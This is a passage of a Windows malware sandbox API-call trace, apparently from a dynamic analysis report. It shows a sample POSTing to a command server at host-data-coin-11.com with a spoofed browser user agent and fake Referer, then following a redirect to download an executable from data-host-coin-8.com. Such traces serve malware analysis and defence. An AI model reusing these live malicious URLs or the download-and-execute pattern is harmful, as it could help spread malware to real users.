returned 0x97d2330 [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x39490312 [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x738b4355 [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x32440e6f [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x692b816a [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xc3e0613 [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7736a268 [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3c413cb4 [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2b87d11b [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x78b1bbc9 [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x378e02b [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2f1cbff0 [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xeff34e [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1b0fcf2e [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2faff2b6 [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x63eef08a [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x20d60f93 [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2c0eb4d0 [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x135179da [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x31b61a49 [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7e180d34 [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4a3f6e64 [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7a935c98 [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6f20e447 [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x22813592 [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3c413cb4 [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x11ff9f00 [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x9164c36 [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x176a31d2 [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x40023a78 [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5c6ea3f6 [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x70fd947d [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7d252d02 [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xe537da5 [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x28414bbf [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x23d54f1b [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x378440d7 [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xe2b8eea [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x24456e6d [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1193b33 [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x21f95e97 [0117.688] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x72a0a57f [0117.689] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7ae627dc [0117.689] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x15d24c4c [0117.689] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x628617c5 [0117.689] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x79331601 [0117.689] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1fc9e4d4 [0117.689] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x224f120a [0117.689] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3c06d1c1 [0117.689] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7e212a27 [0117.689] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x390b1c29 [0117.689] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3636bd05 [0117.689] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x603543b9 [0117.689] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x431a8c32 [0117.689] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x151887bc [0117.689] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x43cde8d7 [0117.689] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3b85a09c [0117.689] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7736fbee [0117.689] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3cccb94 [0117.689] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x132269b [0117.689] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6fbc1111 [0117.689] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x12ea3b7b [0117.689] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x95) returned 0x97d2380 [0117.689] lstrcatA (in: lpString1="", lpString2="4BCD659AD8F347B5B451918CD891C8238443A5AF" | out: lpString1="4BCD659AD8F347B5B451918CD891C8238443A5AF") returned="4BCD659AD8F347B5B451918CD891C8238443A5AF" [0117.689] lstrcatA (in: lpString1="", lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0117.689] lstrcatA (in: lpString1="", lpString2="pub2" | out: lpString1="pub2") returned="pub2" [0117.689] lstrcatA (in: lpString1="", lpString2="m\"`GHCqfvNwSgO+`;a05#od_q;;=CwVM>-PSD)J^,%s6gsUv2:87dHNHu=!AbCGAY(!uUq^R!s'-tNF\\^\"cvIs[hA'NE4WslOXsSmB@Ow)F$LA#K]0'k\"%_>g]" | out: lpString1="v%mCHJe=\\eHrCb.M9_QGHLTr'dBv%gt-1c6EK*+tO7A\\`=(^Um2:G5Wd7Hi.doR#vs2?w:AxQt,\\o4`n)W05s9o0R:0dd'2`/+d9IgdvtBgRb$als$+80F\"EJ^DlM>>-PSD)J^,%s6gsUv2:87dHNHu=!AbCGAY(!uUq^R!s'-tNF\\^\"cvIs[hA'NE4WslOXsSmB@Ow)F$LA#K]0'k\"%_>g]") returned="v%mCHJe=\\eHrCb.M9_QGHLTr'dBv%gt-1c6EK*+tO7A\\`=(^Um2:G5Wd7Hi.doR#vs2?w:AxQt,\\o4`n)W05s9o0R:0dd'2`/+d9IgdvtBgRb$als$+80F\"EJ^DlM>>-PSD)J^,%s6gsUv2:87dHNHu=!AbCGAY(!uUq^R!s'-tNF\\^\"cvIs[hA'NE4WslOXsSmB@Ow)F$LA#K]0'k\"%_>g]" [0119.822] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x10c) returned 0x97d25e0 [0119.822] lstrlenA (lpString="http://host-data-coin-11.com/") returned 29 [0119.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x97d2300, cbMultiByte=30, lpWideCharStr=0x97d25e0, cchWideChar=60 | out: lpWideCharStr="http://host-data-coin-11.com/") returned 30 [0119.822] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x75df4f8 | out: pProxyConfig=0x75df4f8) returned 1 [0119.834] WinHttpOpen (pszAgentW="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x3ea9ba0 [0119.835] WinHttpCrackUrl (in: pwszUrl="http://host-data-coin-11.com/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x75df5b0 | out: lpUrlComponents=0x75df5b0) returned 1 [0119.835] WinHttpConnect (hSession=0x3ea9ba0, pswzServerName="host-data-coin-11.com", nServerPort=0x50, dwReserved=0x0) returned 0x3fa9e40 [0119.835] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x12) returned 0x97d2700 [0119.835] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x68) returned 0x97d2720 [0119.835] WinHttpOpenRequest (hConnect=0x3fa9e40, pwszVerb="POST", pwszObjectName="/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0x3eeb880 [0119.835] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x4e) returned 0x97d2790 [0119.835] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x10d) returned 0x97d27f0 [0119.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xafcfa7f [0119.835] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x12) returned 0x97d2910 [0119.835] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x17) returned 0x97d2930 [0119.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x16b49ee7 [0119.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4d35681a [0119.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3797c5a7 [0119.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6627a471 [0119.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2aff69b1 [0119.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x56207f5e [0119.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xc0f9175 [0119.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3362d58e [0119.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x16b604f4 [0119.835] wsprintfW (in: param_1=0x97d27f0, param_2="Accept: */*\r\nReferer: http://%S%s/" | out: param_1="Accept: */*\r\nReferer: http://ppijjtow.com/") returned 42 [0119.835] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d2930) returned 0x17 [0119.835] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d2930) returned 1 [0119.835] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d2910) returned 0x12 [0119.835] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d2910) returned 1 [0119.835] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d2790) returned 0x4e [0119.836] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d2790) returned 1 [0119.836] WinHttpAddRequestHeaders (hRequest=0x3eeb880, pwszHeaders="Accept: */*\r\nReferer: http://ppijjtow.com/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0119.836] WinHttpSendRequest (hRequest=0x3eeb880, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x97d2470*, dwOptionalLength=0x15c, dwTotalLength=0x15c, dwContext=0x0) returned 1 [0120.153] WinHttpReceiveResponse (hRequest=0x3eeb880, lpReserved=0x0) returned 1 [0120.154] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x2800) returned 0x97d2910 [0120.154] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x97d2910, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df668 | out: lpBuffer=0x97d2910*, lpdwNumberOfBytesRead=0x75df668*=0x46) returned 1 [0120.155] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d2910, Size=0x5000) returned 0x97d2910 [0120.155] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x97d2956, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df668 | out: lpBuffer=0x97d2956*, lpdwNumberOfBytesRead=0x75df668*=0x0) returned 1 [0120.155] VirtualAlloc (lpAddress=0x0, dwSize=0x46, flAllocationType=0x3000, flProtect=0x4) returned 0x38d0000 [0120.159] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d2910) returned 1 [0120.159] WinHttpCloseHandle (hInternet=0x3eeb880) returned 1 [0120.159] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d27f0) returned 0x10d [0120.159] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d27f0) returned 1 [0120.159] WinHttpCloseHandle (hInternet=0x3fa9e40) returned 1 [0120.159] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d2720) returned 0x68 [0120.160] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d2720) returned 1 [0120.160] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d2700) returned 0x12 [0120.160] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d2700) returned 1 [0120.160] WinHttpCloseHandle (hInternet=0x3ea9ba0) returned 1 [0120.160] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d25e0) returned 0x10c [0120.160] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d25e0) returned 1 [0120.160] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d2350) returned 0x116 [0120.160] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d2350) returned 1 [0120.160] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d2470) returned 0x165 [0120.160] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d2470) returned 1 [0120.160] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x1008) returned 0x97d2350 [0120.160] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x1008) returned 0x97d3360 [0120.160] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x13) returned 0x97d4370 [0120.160] lstrlenA (lpString="Location: http://data-host-coin-8.com/files/9718_1641769402_1919.exe") returned 68 [0120.160] lstrlenA (lpString="Location:") returned 9 [0120.160] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x50) returned 0x97d4390 [0120.160] wsprintfA (in: param_1=0x97d4390, param_2="%s" | out: param_1="http://data-host-coin-8.com/files/9718_1641769402_1919.exe") returned 58 [0120.160] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x10c) returned 0x97d43f0 [0120.160] lstrlenA (lpString="http://data-host-coin-8.com/files/9718_1641769402_1919.exe") returned 58 [0120.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x97d4390, cbMultiByte=59, lpWideCharStr=0x97d43f0, cchWideChar=118 | out: lpWideCharStr="http://data-host-coin-8.com/files/9718_1641769402_1919.exe") returned 59 [0120.161] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x75df428 | out: pProxyConfig=0x75df428) returned 1 [0120.170] WinHttpOpen (pszAgentW="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x3ea9ba0 [0120.170] WinHttpCrackUrl (in: pwszUrl="http://data-host-coin-8.com/files/9718_1641769402_1919.exe", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x75df4e0 | out: lpUrlComponents=0x75df4e0) returned 1 [0120.170] WinHttpConnect (hSession=0x3ea9ba0, pswzServerName="data-host-coin-8.com", nServerPort=0x50, dwReserved=0x0) returned 0x3fa9e40 [0120.170] WinHttpOpenRequest (hConnect=0x3fa9e40, pwszVerb=0x0, pwszObjectName="/files/9718_1641769402_1919.exe", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0x3eeb880 [0120.170] WinHttpSendRequest (hRequest=0x3eeb880, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1 [0121.024] WinHttpReceiveResponse (hRequest=0x3eeb880, lpReserved=0x0) returned 1 [0121.024] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x2800) returned 0x97d4510 [0121.024] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x97d4510, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x97d4510*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.025] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4510, Size=0x5000) returned 0x97d4510 [0121.025] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x97d6d10, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x97d6d10*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.109] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4510, Size=0x7800) returned 0x97d4510 [0121.109] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x97d9510, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x97d9510*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.112] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4510, Size=0xa000) returned 0x97dbd20 [0121.114] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x97e3520, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x97e3520*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.218] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97dbd20, Size=0xc800) returned 0x97e5d30 [0121.222] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x97efd30, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x97efd30*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.223] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97e5d30, Size=0xf000) returned 0x97e5d30 [0121.223] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x97f2530, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x97f2530*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.223] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97e5d30, Size=0x11800) returned 0x97d4510 [0121.223] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x97e3510, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x97e3510*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.229] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4510, Size=0x14000) returned 0x97d4510 [0121.229] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x97e5d10, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x97e5d10*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.230] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4510, Size=0x16800) returned 0x97d4510 [0121.230] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x97e8510, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x97e8510*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.232] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4510, Size=0x19000) returned 0x97d4510 [0121.232] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x97ead10, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x97ead10*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.466] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4510, Size=0x1b800) returned 0x97d4510 [0121.466] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x97ed510, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x97ed510*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.466] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4510, Size=0x1e000) returned 0x97d4510 [0121.466] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x97efd10, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x97efd10*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.467] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4510, Size=0x20800) returned 0x97d4510 [0121.467] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x97f2510, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x97f2510*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.467] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4510, Size=0x23000) returned 0x97f4d20 [0121.471] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9815520, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9815520*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.472] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97f4d20, Size=0x25800) returned 0x9817d30 [0121.475] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x983ad30, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x983ad30*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.475] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x9817d30, Size=0x28000) returned 0x97d4510 [0121.475] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x97f9d10, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x97f9d10*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.546] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4510, Size=0x2a800) returned 0x97d4510 [0121.546] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x97fc510, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x97fc510*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.547] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4510, Size=0x2d000) returned 0x97d4510 [0121.547] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x97fed10, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x97fed10*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.556] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4510, Size=0x2f800) returned 0x97d4510 [0121.556] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9801510, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9801510*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.558] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4510, Size=0x32000) returned 0x97d4510 [0121.558] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9803d10, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9803d10*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.559] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4510, Size=0x34800) returned 0x97d4510 [0121.559] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9806510, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9806510*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.561] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4510, Size=0x37000) returned 0x97d4510 [0121.561] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9808d10, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9808d10*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.562] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4510, Size=0x39800) returned 0x97d4510 [0121.562] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x980b510, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x980b510*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.628] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4510, Size=0x3c000) returned 0x97d4510 [0121.628] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x980dd10, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x980dd10*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.631] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4510, Size=0x3e800) returned 0x97d4510 [0121.631] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9810510, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9810510*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.635] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4510, Size=0x41000) returned 0x97d4510 [0121.635] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9812d10, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9812d10*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.643] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4510, Size=0x43800) returned 0x97d4510 [0121.643] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9815510, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 | out: lpBuffer=0x9815510*, lpdwNumberOfBytesRead=0x75df598*=0x2800) returned 1 [0121.645] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4510, Size=0x46000) returned 0x97d4510 [0121.645] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x9817d10, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df598 